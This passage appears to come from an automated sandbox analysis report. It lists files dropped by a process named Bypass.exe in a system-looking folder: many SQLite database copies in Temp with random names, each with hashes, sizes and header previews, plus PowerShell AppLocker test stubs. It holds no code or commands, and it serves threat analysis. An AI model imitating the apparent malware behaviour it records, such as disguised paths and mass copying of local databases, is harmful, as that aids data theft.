Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\XPwBO8xzTc

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\XZrNUYSxt3

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Y820Tr5P9A

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Ye66SHOUx5

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YnqCERigfV

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Yo0aPPZHoa

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YpvYSsof4L

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Z1FO1szJuZ

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Z88VDIDrFm

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ZVz6RyWa8E

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ZcFlLPRdfq

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Zd0Fj7CNWa

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ZgTWGrzv0N

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0usbkkif.trn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ny45loee.d0t.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqqw3tlk.2yd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zltzt5hq.v1m.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\a1kKWWC9Hh

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aBWCc5FNvq

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aVagzIlVpJ

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ayoD6XoM1w

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\b6CHUle7z3

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bBsYIJl4jT

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bbzoqKEM3S

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bdagh3S2vY

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\cYXLrhVksl

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\d5yMQ4LwRu

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
